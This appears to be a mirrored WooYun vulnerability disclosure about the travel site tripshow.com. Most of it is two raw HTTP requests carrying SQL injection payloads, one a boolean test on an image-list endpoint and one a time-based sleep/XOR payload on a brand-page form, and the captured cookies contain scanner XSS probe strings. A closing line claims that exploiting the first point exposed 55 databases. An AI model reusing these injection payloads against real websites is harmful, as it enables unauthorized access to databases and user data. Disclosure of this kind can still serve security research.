乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开
#1
POST /weiboapp/73/processor HTTP/1.1Content-Length: 83Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://tripshow.com:80/Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6Host: tripshow.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*action=get_imglist&id=756505%20AND%203*2*1%3d6%20AND%20187%3d187&img_types=2&page=2
#2
POST /products/brandpages/open HTTP/1.1Content-Length: 262Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://tripshow.com:80/Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6Host: tripshow.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*address=3137%20Laguna%20Street&AgencyTypes=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&description=1&email=sample%40email.tst&location=1&tel=555-666-0606&url=1&VersionID=1
跑第一处来进行证明:55个库,
未能联系到厂商或者厂商积极拒绝